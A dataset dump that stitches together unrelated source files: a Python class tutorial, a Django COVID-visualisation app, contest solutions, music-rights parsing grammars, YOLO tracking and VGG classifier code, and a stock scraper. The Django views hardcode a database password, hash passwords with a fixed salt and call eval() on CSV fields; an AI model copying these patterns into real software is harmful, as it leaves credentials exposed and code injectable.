| fatiando/v0.1 | _static/cookbook/mesher_prismmesh_filter.py | mesher_prismmesh_filter.py | py | 838 | python | en | code | 0 | github-code | 90 |
35962243834 | # Python class
# declare class
class Employee:
# declare cinstructor function
def __init__(emp, name,profile):
# set variables
emp.name = name
emp.profile = profile
# object method
def display(emp):
print("Welcome " + emp.name)
# create instance of Employee class
e1 = Employee('Pramod' , 'developer')
# retrieve class variables
print(e1.name)
print(e1.profile)
# change class variables
e1.profile = "Designer"
print(e1.profile)
# delete object properties
del e1.profile
#below line will raise error as property has been deleted
# print(e1.profile)
# call object methods
e1.display()
# delete class object
del e1
# below line will raise error as object has been deleted
#e1.display() | pramodkoshti/Basic-Python | class.py | class.py | py | 713 | python | en | code | 0 | github-code | 90 |
32490104965 | import random
from imp import reload
import jieba
from django.shortcuts import render
from django.shortcuts import redirect
from django.conf import settings
from django.views.decorators.csrf import csrf_exempt
import os
import sys
reload(sys)
from . import models
from . import forms
import hashlib
import datetime
import csv
import pymysql
# Create your views here.
def hash_code(s, salt='mysite'):
h = hashlib.sha256()
s += salt
h.update(s.encode())
return h.hexdigest()
def make_confirm_string(user):
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
code = hash_code(user.name, now)
models.ConfirmString.objects.create(code=code, user=user)
return code
@csrf_exempt
def index(request):
if not request.session.get('is_login', None):
return redirect('/login/')
try:
if request.GET:
date = request.GET['date']
else:
date = '2020-03-01'
except:
date = '2020-03-01'
try:
type=request.GET['out']
except:
type = 'in'
with open(r'C:\Users\15503\PycharmProjects\mysite\login\csv文件\youtube词云数据.csv', 'r', encoding='utf-8') as f:
reader = csv.reader(f)
header_row = next(reader)
date1, comment1,num1 = [], [],[]
for row in reader:
date1.append(row[0])
comment1.append(row[1])
num1.append(row[2])
with open(r'C:\Users\15503\PycharmProjects\mysite\login\csv文件\微博词云数据.csv', 'r', encoding='utf-8') as f:
reader = csv.reader(f)
header_row = next(reader)
date2, comment2 ,num2= [], [],[]
for row in reader:
date2.append(row[0])
comment2.append(row[1])
num2.append(row[2])
cy_date=date[-2:]
cy_date=str(int(cy_date))
index=int(cy_date)-1
if type!='in':
cy_comment = eval(comment1[index])
cy_num = eval(num1[index])
else:
cy_comment = eval(comment2[index])
cy_num = eval(num2[index])
db = pymysql.connect("localhost", "root", "20413wrx", "runoob", charset='utf8')
cursor = db.cursor()
cursor.execute("SELECT * FROM 微博疫情评论分析结果")
results = cursor.fetchall()
topic, positive, negative, neutral = [], [], [], []
for row in results:
topic.append(row[0])
positive.append(row[1])
negative.append(int(row[2]))
neutral.append(int(row[3]))
date = date[5:7] + '.' + date[-2:]
ctx = date[-1]
cursor = db.cursor()
cursor.execute("SELECT * FROM 全国疫情情况")
results = cursor.fetchall()
date1, province, confirm, dead, heal = [], [], [], [], []
for row in results:
date1.append(row[0])
province.append(row[1])
confirm.append(int(row[2]))
dead.append(int(row[3]))
heal.append(int(row[4]))
index = []
for i in range(len(date1)):
if date1[i] == date:
index.append(i)
map_province, map_confirm, map_dead, map_heal = [], [], [], []
for i in index:
map_province.append(province[i])
map_confirm.append(confirm[i])
map_dead.append(dead[i])
map_heal.append(heal[i])
name='湖北'
date11='03.01'
if request.POST:
name = request.POST['name']
date1=random.randint(10, 30)
date11='03.'+str(date1)
cursor = db.cursor()
cursor.execute("SELECT * FROM 各省疫情情况")
results = cursor.fetchall()
date1, city, province, confirm, dead, heal = [], [], [], [], [], []
for row in results:
date1.append(row[0])
province.append(row[1])
city.append(row[2])
confirm.append(int(row[3]))
dead.append(row[4])
heal.append(row[5])
index = []
for i in range(len(date1)):
if date1[i] == date11:
index.append(i)
city_name = []
city_confirm = []
for i in index:
if province[i] == name:
city_name.append(city[i])
city_confirm.append(confirm[i])
if name=='湖北':
city_name[2]='襄阳市'
city_name[4] = '恩施土家族苗族自治州'
cursor = db.cursor()
cursor.execute("SELECT * FROM 新增人数")
results = cursor.fetchall()
date, confirm, dead, heal = [], [], [], []
for row in results:
date.append(row[0])
confirm.append(row[1])
dead.append(row[3])
heal.append(row[4])
import json
ctx=int(ctx)+1
cursor = db.cursor()
cursor.execute("SELECT * FROM 湖北人口迁出情况")
results = cursor.fetchall()
ctx_date,ctx_city ,ctx_province= [],[],[]
for row in results:
ctx_city.append(row[0])
ctx_province.append(row[1])
ctx_date.append(float(row[ctx]))
cursor = db.cursor()
cursor.execute("SELECT * FROM 湖北人口迁入情况")
results = cursor.fetchall()
cyx_date,cyx_city,cyx_province = [],[],[]
for row in results:
cyx_city.append(row[0])
cyx_province.append(row[1])
cyx_date.append(float(row[ctx]))
return render(request, 'login/index.html',{
'date': json.dumps(date),'confirm': json.dumps(confirm),'dead': json.dumps(dead),'heal': json.dumps(heal),'ctx_city': json.dumps(ctx_city),'ctx_date': json.dumps(ctx_date),
'cyx_city': json.dumps(cyx_city), 'cyx_date': json.dumps(cyx_date),'ctx_province': json.dumps(ctx_province),'cyx_province': json.dumps(cyx_province),
'map_province': json.dumps(map_province), 'map_confirm': json.dumps(map_confirm), 'map_dead': json.dumps(map_dead),
'map_heal': json.dumps(cyx_province),'city_name': json.dumps(city_name), 'city_confirm': json.dumps(city_confirm),'name': json.dumps(name),
'topic': json.dumps(topic), 'positive': json.dumps(positive),
'negative': json.dumps(negative), 'neutral': json.dumps(neutral), 'cy_num': json.dumps(cy_num), 'cy_comment': json.dumps(cy_comment),
})
def login(request):
if request.session.get('is_login', None): # 不允许重复登录
return redirect('/index/')
if request.method == 'POST':
login_form = forms.UserForm(request.POST)
message = '请检查填写的内容!'
if login_form.is_valid():
username = login_form.cleaned_data.get('username')
password = login_form.cleaned_data.get('password')
try:
user = models.User.objects.get(name=username)
except :
message = '用户不存在!'
return render(request, 'login/login.html', locals())
if user.password == hash_code(password):
request.session['is_login'] = True
request.session['user_id'] = user.id
request.session['user_name'] = user.name
return redirect('/index/')
else:
message = '密码不正确!'
return render(request, 'login/login.html', locals())
else:
return render(request, 'login/login.html', locals())
login_form = forms.UserForm()
return render(request, 'login/login.html', locals())
def register(request):
if request.session.get('is_login', None):
return redirect('/index/')
if request.method == 'POST':
register_form = forms.RegisterForm(request.POST)
message = "请检查填写的内容!"
if register_form.is_valid():
username = register_form.cleaned_data.get('username')
password1 = register_form.cleaned_data.get('password1')
password2 = register_form.cleaned_data.get('password2')
sex = register_form.cleaned_data.get('sex')
if password1 != password2:
message = '两次输入的密码不同!'
return render(request, 'login/register.html', locals())
else:
same_name_user = models.User.objects.filter(name=username)
if same_name_user:
message = '用户名已经存在'
return render(request, 'login/register.html', locals())
new_user = models.User()
new_user.name = username
new_user.password = hash_code(password1)
new_user.sex = sex
new_user.save()
return redirect('/login/')
else:
return render(request, 'login/register.html', locals())
register_form = forms.RegisterForm()
return render(request, 'login/register.html', locals())
def logout(request):
if not request.session.get('is_login', None):
return redirect('/login/')
request.session.flush()
# del request.session['is_login']
return redirect("/login/")
| gerly1980/epidemic_visualization | login/views.py | views.py | py | 8,782 | python | en | code | null | github-code | 90 |
18221204409 | def main():
N = int(input())
A = [int(i) for i in input().split()]
B = [(i+1)+a for i, a in enumerate(A)]
from collections import Counter
c = Counter()
ans = 0
for j in range(N):
i = j
v = (j+1) - A[j]
ans += c[v]
c[B[i]] += 1
print(ans)
if __name__ == '__main__':
main()
| Aasthaengg/IBMdataset | Python_codes/p02691/s528927253.py | s528927253.py | py | 344 | python | en | code | 0 | github-code | 90 |
34400822572 | # -*- coding: utf-8 -*-
import datetime
import pyparsing as pp
from cwr.other import VISAN, AVIKey
from cwr.grammar.field import basic
from config_cwr.accessor import CWRConfiguration
from data_cwr.accessor import CWRTables
"""
Grammar for special cases and other fields.
These are miscellany fields and nodes, such as line limiters, or the character
encoding field.
"""
__author__ = 'Bernardo Martínez Garrido'
__license__ = 'MIT'
__status__ = 'Development'
# Acquires data sources
_config = CWRConfiguration()
# GENERAL GRAMMAR
lineStart = pp.lineStart.suppress()
lineStart.setName("Start of line")
lineEnd = pp.lineEnd.suppress()
lineEnd.setName("End of line")
# CONCRETE CASES FIELDS
def ipi_base_number(name=None):
"""
IPI Base Number field.
An IPI Base Number code written on a field follows the Pattern
C-NNNNNNNNN-M. This being:
- C: header, a character.
- N: numeric value.
- M: control digit.
So, for example, an IPI Base Number code field can contain I-000000229-7.
:param name: name for the field
:return: a parser for the IPI Base Number field
"""
if name is None:
name = 'IPI Base Number Field'
field = pp.Regex('I-[0-9]{9}-[0-9]')
# Name
field.setName(name)
field_num = basic.numeric(13)
field_num.setName(name)
field = field | field_num
# White spaces are not removed
field.leaveWhitespace()
return field.setResultsName('ipi_base_n')
def ipi_name_number(name=None):
"""
IPI Name Number field.
An IPI Name Number is composed of eleven digits.
So, for example, an IPI Name Number code field can contain 00014107338.
:param name: name for the field
:return: a parser for the IPI Name Number field
"""
if name is None:
name = 'IPI Name Number Field'
field = basic.numeric(11)
field.setName(name)
return field.setResultsName('ipi_name_n')
def iswc(name=None):
"""
ISWC field.
A ISWC code written on a field follows the Pattern TNNNNNNNNNC.
This being:
- T: header, it is always T.
- N: numeric value.
- C: control digit.
So, for example, an ISWC code field can contain T0345246801.
:param name: name for the field
:return: a parser for the ISWC field
"""
if name is None:
name = 'ISWC Field'
# T followed by 10 numbers
field = pp.Regex('T[0-9]{10}')
# Name
field.setName(name)
# White spaces are not removed
field.leaveWhitespace()
return field.setResultsName('iswc')
def percentage(columns, maximum=100, name=None):
"""
Creates the grammar for a Numeric (N) field storing a percentage and
accepting only the specified number of characters.
It is possible to set the maximum allowed value. By default this is 100
(for 100%), and if modified it is expected to be reduced, not increased.
The three first digits will be for the integer value.
The columns can't be lower than 3.
:param columns: number of columns for this field
:param maximum: maximum allowed value
:param name: name for the field
:return: grammar for the float numeric field
"""
if name is None:
name = 'Percentage Field'
if columns < 3:
message = 'The values can not be lower than 3'
raise pp.ParseException(message)
field = basic.numeric_float(columns, 3)
field.addParseAction(lambda v: _assert_is_percentage(v[0], maximum))
field.setName(name)
return field
def _assert_is_percentage(value, maximum=100):
"""
Makes sure the received value is a percentage. Otherwise an exception is
thrown.
:param value: the value to check
"""
if value < 0 or value > maximum:
message = 'The value on a percentage field should be between 0 and %s' \
% maximum
raise pp.ParseException(message)
def ean_13(name=None):
"""
Creates the grammar for an EAN 13 code.
These are the codes on thirteen digits barcodes.
:param name: name for the field
:return: grammar for an EAN 13 field
"""
if name is None:
name = 'EAN 13 Field'
field = basic.numeric(13)
field = field.setName(name)
return field.setResultsName('ean_13')
def isrc(name=None):
"""
Creates the grammar for an ISRC code.
ISRC stands for International Standard Recording Code, which is the
standard ISO 3901. This stores information identifying a particular
recording.
:param name: name for the field
:return: grammar for an ISRC field
"""
if name is None:
name = 'ISRC Field'
field = _isrc_short(name) | _isrc_long(name)
field.setName(name)
return field.setResultsName('isrc')
def _isrc_short(name=None):
"""
Creates the grammar for a short ISRC code.
ISRC stands for International Standard Recording Code, which is the
standard ISO 3901. This stores information identifying a particular
recording.
This variant contains separator for the parts, and follows the pattern:
CC-XXX-YY-NN
Where each code means:
- CC: country code
- XXX: registrant
- YY: year
- NN: work id
:param name: name for the field
:return: grammar for an ISRC field
"""
config = CWRTables()
if name is None:
name = 'ISRC Field'
# separator = pp.Literal('-')
country = config.get_data('isrc_country_code')
# registrant = basic.alphanum(3)
# year = pp.Regex('[0-9]{2}')
# work_id = pp.Regex('[0-9]{2}')
country_regex = ''
for c in country:
if len(country_regex) > 0:
country_regex += '|'
country_regex += c
country_regex = '(' + country_regex + ')'
field = pp.Regex(country_regex + '-.{3}-[0-9]{2}-[0-9]{2}')
# country.setName('ISO-2 Country Code')
# registrant.setName('Registrant')
# year.setName('Year')
# work_id.setName('Work ID')
field.setName(name)
return field.setResultsName('isrc')
def _isrc_long(name=None):
"""
Creates the grammar for a short ISRC code.
ISRC stands for International Standard Recording Code, which is the
standard ISO 3901. This stores information identifying a particular
recording.
This variant contain no separator for the parts, and follows the pattern:
CCXXXYYNNNNN
Where each code means:
- CC: country code
- XXX: registrant
- YY: year
- NNNNN: work id
:param name: name for the field
:return: grammar for an ISRC field
"""
config = CWRTables()
if name is None:
name = 'ISRC Field'
country = config.get_data('isrc_country_code')
# registrant = basic.alphanum(3)
# year = pp.Regex('[0-9]{2}')
# work_id = pp.Regex('[0-9]{5}')
country_regex = ''
for c in country:
if len(country_regex) > 0:
country_regex += '|'
country_regex += c
country_regex = '(' + country_regex + ')'
field = pp.Regex(country_regex + '.{3}[0-9]{2}[0-9]{5}')
# country.setName('ISO-2 Country Code')
# registrant.setName('Registrant')
# year.setName('Year')
# work_id.setName('Work ID')
field.setName(name)
return field.setResultsName('isrc')
def visan(name=None):
"""
Creates the grammar for a V-ISAN code.
This is a variation on the ISAN (International Standard Audiovisual Number)
:param name: name for the field
:return: grammar for an ISRC field
"""
if name is None:
name = 'V-ISAN Field'
field = pp.Regex('[0-9]{25}')
field.setName(name)
return field.setResultsName('visan')
def audio_visual_key(name=None):
"""
Creates the grammar for an Audio Visual Key code.
This is a variation on the ISAN (International Standard Audiovisual Number)
:param name: name for the field
:return: grammar for an ISRC field
"""
if name is None:
name = 'AVI Field'
society_code = basic.numeric(3)
society_code = society_code.setName('Society Code') \
.setResultsName('society_code')
av_number = basic.alphanum(15, extended=True, isLast=True)
field_empty = pp.Regex('[ ]{15}')
field_empty.setParseAction(pp.replaceWith(''))
av_number = av_number | field_empty
av_number = av_number.setName('Audio-Visual Number') \
.setResultsName('av_number')
field = pp.Group(society_code + pp.Optional(av_number))
field.setParseAction(lambda v: _to_avi(v[0]))
field = field.setName(name)
return field.setResultsName('audio_visual_key')
def _to_avi(parsed):
"""
Transforms the data from an AVI field into an AVIKey instance.
:param parsed: the data parsed from an AVI field
:return: an AVIKey instance created from the data
"""
return AVIKey(parsed.society_code, parsed.av_number)
def date_time(name=None):
"""
Creates the grammar for a date and time field, which is a combination of
the Date (D) and Time or Duration field (T).
This field requires first a Date, and then a Time, without any space in
between.
:param name: name for the field
:return: grammar for a Date and Time field
"""
if name is None:
name = 'Date and Time Field'
date = basic.date('Date')
time = basic.time('Time')
date = date.setResultsName('date')
time = time.setResultsName('time')
field = pp.Group(date + time)
field.setParseAction(lambda d: _combine_date_time(d[0]))
field.setName(name)
return field.setResultsName('date_time')
def _combine_date_time(data):
"""
Combines the received date and time.
:param data: date and time to combine
:return: the date and time combined
"""
return datetime.datetime.combine(data.date, data.time)
def lookup_int(values, name=None):
"""
Lookup field which transforms the result into an integer.
:param values: values allowed
:param name: name for the field
:return: grammar for the lookup field
"""
field = basic.lookup(values, name)
field.addParseAction(lambda l: int(l[0]))
return field
| weso/CWR-DataApi | cwr/grammar/field/special.py | special.py | py | 10,114 | python | en | code | 32 | github-code | 90 |
18405219239 | N,K = map(int,input().split())
def div_count(n,i):
ans = i
count = 0
while n>ans:
ans *= 2
count += 1
return count
ans = 0
for i in range(1,N+1):
count = div_count(K,i)
ans += (1/N) * pow(0.5,count)
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p03043/s535174696.py | s535174696.py | py | 256 | python | en | code | 0 | github-code | 90 |
24785030365 |
import unittest
import pandas as pd
import numpy as np
from prophet_model import *
# from datasets import *
# from metrics import *
class TestProphetModel(unittest.TestCase):
def test_fit_and_predict(self):
n = 100
fh = [1, 2]
data = pd.DataFrame({'x': np.arange(n)})
data.index = pd.date_range('2020-01-01', periods=n)
# data = load_daily_data()
pr = ProphetModel()
pr.fit(data)
pred = pr.predict(fh)
self.assertEqual(len(pred), max(fh))
if __name__ == '__main__':
unittest.main() | dirknbr/forecast_py | prophet_model_test.py | prophet_model_test.py | py | 524 | python | en | code | 0 | github-code | 90 |
15936393649 | import cv2
import numpy as np
from ultralytics import YOLO
import socket
from norfair import Detection, Tracker
from datetime import datetime
import uuid
import time
import os
class Settings:
"""The class with global variables used throughout the code"""
last_time_notif = None
entered_time = None
exit_time = None
first_time_notif = None
UDP_PORT_NO_NOTIFICATIONS = 4242
UDP_IP_ADDRESS = "192.168.0.134"
Sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
past_y_dict = {}
file_for_video = "videos/"
file_for_detections = "videos/"
if not os.path.exists(file_for_video):
os.makedirs(file_for_video)
if not os.path.exists(file_for_detections):
os.makedirs(file_for_detections)
setting = Settings()
class Yolo_detections:
"""Class with results of detecting people with YOLOv8 model"""
def __init__(self, task='predict', model='yolov8s.pt'):
# we use tensorrt speeded-up weights
if task == 'predict':
self.model = YOLO(model)
elif task == 'pose':
self.model = YOLO("services/models/yolov8s-pose.pt")
def detect(self, frame, classes=[0], centers=False, conf=0.4, iou=0.7):
"""Detecting people"""
yolo_detections = self.model.predict(
frame, classes=classes, conf=conf, verbose=False, iou=iou
)
res = yolo_detections[0].boxes.cpu().numpy()
if centers:
boxes = res.xywh.astype(np.uint32)
else:
boxes = res.xyxy.astype(np.uint32)
cls = res.cls.astype(np.uint8)
conf = res.conf
return boxes, cls, conf
def track(self, frame):
results = self.model.track(frame, classes=[0], persist=True, verbose=False, tracker='botsort.yaml')[
0].boxes.cpu().numpy()
boxes = results.xyxy.astype(np.uint32)
if results.id is None:
track_ids = []
else:
track_ids = results.id.astype(np.uint8)
clss = results.cls.astype(np.uint8)
conf = results.conf
return boxes, clss, track_ids, conf
def pose(self, frame):
results = self.model.track(
frame, verbose=False, conf=0.4, tracker='botsort.yaml')
return results
class Norfair_Detections:
"""Norfair is used as a tracker standard in our company"""
def __init__(self):
self.tracker = Tracker(
distance_function="euclidean",
distance_threshold=100,
# hit_counter_max=5,
initialization_delay=3,
)
def transform_yolo2norfair(self, yolo):
"""Pass the result of yolo detections for Norfair Tracker"""
self.boxes, self.cls, self.conf = yolo
detections = []
for i, box in enumerate(self.boxes):
detections.append(
[box[0], box[1], box[2], box[3], self.conf[i], self.cls[i]]
)
detections = np.asarray(detections)
norfair_detections = [Detection(points) for points in detections]
return norfair_detections
def update(self, yolo_det):
"""The function that updates tracking results in the main loop"""
norfair_detections = self.transform_yolo2norfair(yolo_det)
tracked_objects = self.tracker.update(detections=norfair_detections)
return tracked_objects
def draw_bboxes(self, frame, res):
"""The function that draws bounding boxes on people"""
for box in res:
track_id = box.id
x1, y1 = int(box.estimate[0, 0]), int(box.estimate[0, 1])
x2, y2 = int(box.estimate[0, 2]), int(box.estimate[0, 3])
cv2.putText(frame, str(track_id), (x1, y1+20),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 2, cv2.LINE_AA)
cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 0, 255), 3)
class video_writer_advanced:
"""The more advanced class for video recording"""
def __init__(self):
self.fcc = cv2.VideoWriter_fourcc("X", "V", "I", "D")
self.fps = 20
self.path = None
self.key = None
self.record = False
self.video_writer = None
self.record_start_time = None
self.id = None
self.preview_path = None
self.preview_key = None
def start_recording(self, height=1080, width=1920):
"""The function that creates the id for video and initializes the videowriter"""
if not self.record:
self.id = str(uuid.uuid4())
self.record_start_time = time.time()
current_datetime = datetime.now()
formatted_date = current_datetime.strftime("%Y-%m-%d")
formatted_time = current_datetime.strftime("%H:%M:%S")
self.save_file = setting.file_for_detections + formatted_date + \
" " + formatted_time + " " + self.id + ".avi"
self.path = self.save_file
self.key = self.id + ".avi"
self.video_writer = cv2.VideoWriter(
self.save_file, self.fcc, self.fps, (width, height)
)
self.record = True
def update(self, frame):
"""The function that adds frames to the video. The process stops once the video duration reaches 3 sec"""
if self.record:
# print("writing a frame")
self.video_writer.write(frame)
# print(os.listdir(setting.file_for_detections))
if time.time() - self.record_start_time > 20:
self.record = False
self.video_writer.release()
def release(self):
if self.record:
self.record = False
self.video_writer.release()
| PikaBeka/bus-passenger-counter | utils/cls_git.py | cls_git.py | py | 5,691 | python | en | code | 0 | github-code | 90 |
18768116381 | import torch
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
import torch.nn.functional as F
import math
import cv2
import numpy as np
import os
model_urls = {'vgg16': 'https://download.pytorch.org/models/vgg16-397923af.pth'}
class PAM(nn.Module):
def __init__(self, alpha):
super(PAM, self).__init__()
self.relu = nn.ReLU(inplace=True)
self.selector = nn.AdaptiveMaxPool2d(1)
self.alpha = alpha
def forward(self, x):
b, c, _, _ = x.size()
x = self.relu(x)
""" 1: selector """
peak_region = self.selector(x).view(b, c, 1, 1)
peak_region = peak_region.expand_as(x)
""" 2: Controller -> self.alpha"""
boundary = (x < peak_region * self.alpha)
""" 3: Peak Stimulator"""
x = torch.where(boundary, torch.zeros_like(x), x)
return x
class VGG(nn.Module):
def __init__(self, features, num_classes=20,
alpha=0.7, init_weights=True):
super(VGG, self).__init__()
self.features = features
self.layer1_conv1 = features[0]
self.layer1_conv2 = features[2]
self.layer1_maxpool = features[4]
self.layer2_conv1 = features[5]
self.layer2_conv2 = features[7]
self.layer2_maxpool = features[9]
self.layer3_conv1 = features[10]
self.layer3_conv2 = features[12]
self.layer3_conv3 = features[14]
self.layer3_maxpool = features[16]
self.layer4_conv1 = features[17]
self.layer4_conv2 = features[19]
self.layer4_conv3 = features[21]
self.layer4_maxpool = features[23]
self.layer5_conv1 = features[24]
self.layer5_conv2 = features[26]
self.layer5_conv3 = features[28]
self.extra_conv1 = nn.Conv2d(512, 512, kernel_size=3, padding=1)
self.extra_conv2 = nn.Conv2d(512, 512, kernel_size=3, padding=1)
self.extra_conv3 = nn.Conv2d(512, 512, kernel_size=3, padding=1)
self.extra_conv4 = nn.Conv2d(512, 20, kernel_size=1)
self.pam = PAM(alpha)
self.relu = nn.ReLU(inplace=True)
if init_weights:
self._initialize_weights(self.extra_conv1)
self._initialize_weights(self.extra_conv2)
self._initialize_weights(self.extra_conv3)
self._initialize_weights(self.extra_conv4)
def forward(self, x, label=None, size=None):
if size is None:
size = x.size()[2:]
# layer1
x = self.layer1_conv1(x)
x = self.relu(x)
x = self.layer1_conv2(x)
x = self.relu(x)
x = self.layer1_maxpool(x)
# layer2
x = self.layer2_conv1(x)
x = self.relu(x)
x = self.layer2_conv2(x)
x = self.relu(x)
x = self.layer2_maxpool(x)
# layer3
x = self.layer3_conv1(x)
x = self.relu(x)
x = self.layer3_conv2(x)
x = self.relu(x)
x = self.layer3_conv3(x)
x = self.relu(x)
x = self.layer3_maxpool(x)
# layer4
x = self.layer4_conv1(x)
x = self.relu(x)
x = self.layer4_conv2(x)
x = self.relu(x)
x = self.layer4_conv3(x)
x = self.relu(x)
x = self.layer4_maxpool(x)
# layer5
x = self.layer5_conv1(x)
x = self.relu(x)
x = self.layer5_conv2(x)
x = self.relu(x)
x = self.layer5_conv3(x)
x = self.relu(x)
# ==============================
x = self.extra_conv1(x)
x = self.pam(x)
x = self.extra_conv2(x)
x = self.pam(x)
x = self.extra_conv3(x)
x = self.pam(x)
x = self.extra_conv4(x)
# ==============================
logit = self.fc(x)
if self.training:
return logit
else:
cam = self.cam_normalize(x.detach(), size, label)
return logit, cam
def fc(self, x):
x = F.avg_pool2d(x, kernel_size=(x.size(2), x.size(3)), padding=0)
x = x.view(-1, 20)
return x
def cam_normalize(self, cam, size, label):
B, C, H, W = cam.size()
cam = F.relu(cam)
cam = cam * label[:, :, None, None]
cam = F.interpolate(cam, size=size, mode='bilinear', align_corners=False)
cam /= F.adaptive_max_pool2d(cam, 1) + 1e-5
return cam
def _initialize_weights(self, layer):
for m in layer.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
def get_parameter_groups(self):
groups = ([], [], [], [])
for name, value in self.named_parameters():
if 'extra' in name:
if 'weight' in name:
groups[2].append(value)
else:
groups[3].append(value)
else:
if 'weight' in name:
groups[0].append(value)
else:
groups[1].append(value)
return groups
#######################################################################################################
def make_layers(cfg, batch_norm=False):
layers = []
in_channels = 3
for i, v in enumerate(cfg):
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
elif v == 'N':
layers += [nn.MaxPool2d(kernel_size=3, stride=1, padding=1)]
else:
if i > 13:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, dilation=2, padding=2)
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
return nn.Sequential(*layers)
cfg = {
'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'D1': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'N', 512, 512, 512],
'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
def vgg16_pam(pretrained=True, alpha=0.7):
model = VGG(make_layers(cfg['D1']), alpha=alpha)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['vgg16']), strict=False)
return model
if __name__ == '__main__':
import copy
model = vgg16(pretrained=True)
print()
print(model)
input = torch.randn(2, 3, 321, 321)
label = np.array([[1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 0., 0., 0., 0., 0.]])
label = torch.from_numpy(label)
out = model(input, label)
print(out[1].shape)
| clovaai/BESTIE | PAM/models/classifier.py | classifier.py | py | 7,674 | python | en | code | 49 | github-code | 90 |
10177321616 | import json
fp_1 = input("Enter first filepath: ")
fp_2 = input("Enter second filepath: ")
fp_out = input("Enter output filepath: ")
with open(fp_1) as f1:
d1 = json.load(f1)
with open(fp_2) as f2:
d2 = json.load(f2)
merged ={key : value for key, value in list(d1.items()) + list(d2.items())}
with open(fp_out, "w") as fo:
json.dump(merged, fo, indent=4) | frederikschmitt/gpt-3-code-gen | data/python/json/program.py | program.py | py | 366 | python | en | code | 2 | github-code | 90 |
25070318314 | def run():
# for contador in range(1000):
# # if contador % 2 != 0:
# # continue
# # print(contador)
# # if contador == 500:
# # break
# # print(contador)
texto = input("Escribe un texto: ")
for letra in texto:
if letra == "o":
break
print(letra)
if __name__ == '__main__':
run() | eamarquezh/codigos_python | break_continue.py | break_continue.py | py | 381 | python | pt | code | 0 | github-code | 90 |
26687070192 | # -*- coding: utf-8 -*-
from bs4 import BeautifulSoup as bs
import urllib.request
import pymysql
import csv
b=[]
c=[]
tb = []
with open('./Kospi_data.csv','r') as csvfile:
reader = csv.reader(csvfile)
for i, row in enumerate(reader):
b.append(row[0])
c.append(row[1])
tb.append("kr"+row[0])
b.pop(0)
tb.pop(0)
# print tb
c.pop(0)
list = zip(b,c)
con = pymysql.connect(host='localhost', user='root', password='',
db="finance", charset='utf8')
for i in range(len(b)):
for p in range(1):
try:
# curs = con.cursor()
# html = urllib.request.urlopen('http://comp.fnguide.com/SVO2/ASP/SVD_Main.asp?pGB=1&gicode=A%s&cID=&MenuYn=Y&ReportGB=&NewMenuID=101&stkGb=701'% b[i])
html = urllib.request.urlopen('http://comp.fnguide.com/SVO2/ASP/SVD_Main.asp?pGB=1&gicode=A%s&cID=&MenuYn=Y&ReportGB=&NewMenuID=101&stkGb=701'% b[i])
html2 = urllib.request.urlopen('http://comp.fnguide.com/SVO2/ASP/SVD_Invest.asp?pGB=1&gicode=A%s&cID=&MenuYn=Y&ReportGB=&NewMenuID=105&stkGb=701'% b[i])
soup = bs(html, "html.parser")
soup2 = bs(html2, "html.parser")
table = b[i]
tsw = soup.find("div", "corp_group2")
prw = soup2.find_all("td", 'tdbg_y')
net = soup.find_all("td", 'tdbg_b')
# try:
try:
netp = float("".join(net[4].get_text().split(',')))
except:
netp = -1.0
try:
pcr = float(prw[35].get_text())
except:
pcr = -1.0
# dd = tsw.find_all("dd")[1]
try:
per = float(tsw.find_all("dd")[1].get_text())
except:
per = -1.0
try:
pbr = float(tsw.find_all("dd")[7].get_text())
except:
pbr = -1.0
try:
divid = float(tsw.find_all("dd")[9].get_text())
divid = divid.replace("%", '')
except:
divid = -1.0
if per == "-":
per = -1.0
if divid == "-":
divid = -1.0
# print c[i], b[i], per, pbr, pcr, divid, netp
# print type(c[i]), type(b[i]), type(per), type(pbr), type(pcr), type(divid), type(netp)
# qr = "insert into Information (CompanyCode, PER, PBR, PCR, Dividend, NetProfit)\
# values ('%s', %f, %f, %f, %f, %f)" % (b[i].zfill(6), per, pbr, pcr, divid, netp)
# print c[i], b[i], per, pbr, pcr, divid, netp
# curs.execute(qr)
# con.commit()
# curs.close()
# except:
# netp = 0
# pcr = float(prw[35].get_text())
# dd = tsw.find_all("dd")[1]
# per = tsw.find_all("dd")[1].get_text()
# pbr = float(tsw.find_all("dd")[7].get_text())
# divid = tsw.find_all("dd")[9].get_text()
# divid = divid.replace("%", '')
# if per == "-":
# per = -1
# if divid == "-":
# divid = -1
# print c[i], b[i], per, pbr, pcr, divid, netp
# qr = "insert into Information (Company, CompanyCode, PER, PBR, PCR, Dividend, NetProfit) \
# values ('%s', '%s', %0.2f, %0.2f, %0.2f, %0.2f, %d)" % (c[i], b[i], per, pbr, pcr, divid, netp)
# # curs.execute(qr)
# con.commit()
# curs.close()
except:
break
| TaewonHeo/kospi_parsing | Information.py | Information.py | py | 3,610 | python | en | code | 1 | github-code | 90 |
7679002864 |
import setuptools
import re
version = re.search(
'^__version__\s*=\s*"(.*)"',
